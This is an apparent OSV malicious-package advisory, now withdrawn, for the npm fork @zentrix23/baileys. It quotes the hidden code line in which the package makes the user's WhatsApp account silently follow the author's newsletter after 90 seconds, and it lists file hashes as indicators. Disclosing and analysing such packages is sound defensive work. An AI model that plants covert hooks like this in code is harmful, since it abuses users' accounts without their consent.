MAL-2026-4470

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@zentrix23/baileys/MAL-2026-4470.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4470
Withdrawn
2026-05-26T21:41:23Z
Published
2026-05-21T01:33:24Z
Modified
2026-05-27T00:32:04.196003915Z
Summary
Malicious code in @zentrix23/baileys (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (00e60d3c1f2afd09e236dc4a5ae0cf2373029e6c62c4f7a9c571b13c2da01cd7)

This package is a fork of @whiskeysockets/baileys with an undocumented modification: inside makeNewsletterSocket (called unconditionally by makeWASocket()), a setTimeout schedules a FOLLOW mutation against the hardcoded newsletter JID '120363425412882254@newsletter' (Zentrix Tech) 90 seconds after socket creation, using the consumer's authenticated WhatsApp session. Errors are silently swallowed (try/catch {}). Any developer or bot operator using this library to automate a WhatsApp account will have that account silently follow the author's promotional newsletter without consent or disclosure. This is a silent-relay / covert-action pattern: the package's normal advertised API (WhatsApp socket library) is weaponized to perform an unrelated action benefiting the author using the caller's identity. Evidence: lib/Socket/newsletter.js ~line 95 contains setTimeout(async () => { try { await newsletterWMexQuery('120363425412882254@newsletter', Types_1.QueryIds.FOLLOW); } catch {} }, 90000);. Separately, lib/Utils/generics.js line 276 fetches a version JSON from raw.githubusercontent.com/kiuur/bails/master/... — a personal user's mutable branch unrelated to the upstream Baileys publisher; this is user-invoked (not auto-executed) and the response is parsed as JSON only, so it is a quality concern rather than RCE, but it indicates the fork is not a trusted republish of upstream.

Database specific
{
    "malicious-packages-origins": [
        {
            "sha256": "00e60d3c1f2afd09e236dc4a5ae0cf2373029e6c62c4f7a9c571b13c2da01cd7",
            "id": "IN-MAL-2026-003693",
            "source": "amazon-inspector",
            "modified_time": "2026-05-21T01:33:24Z",
            "versions": [
                "1.0.0"
            ],
            "import_time": "2026-05-26T05:51:07.51782117Z"
        }
    ]
}

Affected packages

npm / @zentrix23/baileys

Package

Name
@zentrix23/baileys
Purl
pkg:npm/%40zentrix23%2Fbaileys

Affected ranges

Affected versions

1.*
1.0.0

Database specific

source
"https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@zentrix23/baileys/MAL-2026-4470.json"
cwes
[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]
indicators
{
    "evidence_files": [
        {
            "sha256": "4ae5b6a68e081e72a5933791417b58565f3fca9838e5488ac0a1524eb2576d42",
            "tlsh": "3142a55665fa5ba617a37054e63fb0e0b320f243796598673f8c90020f4e1dda8b3bd9",
            "path": "lib/Socket/newsletter.js"
        },
        {
            "tlsh": "55621aca9bf344770793a1d9a727e016bb3ac8233159c4f8f91d87205f814a4cad67e9",
            "sha256": "7829406447a48fdfbdd3ab329845a21c199b8143deebe777dd8ce8f7c2b82f7d",
            "path": "lib/Utils/generics.js"
        }
    ],
    "package_integrity": [
        {
            "filename": "baileys-1.0.0.tgz",
            "hashes": {
                "sha1": "83aab7db2ae9c6f3cde2ab9683987c9ef1c4336d",
                "sha512_sri": "sha512-+AE1PvwUeLAelPDMTwm++X39tg+NFcgMOdrTxwfrkyhlkJ4h+QOtuJMP8IElzoE+WT4tEG37yRhdtPmcojhfwQ=="
            }
        }
    ]
}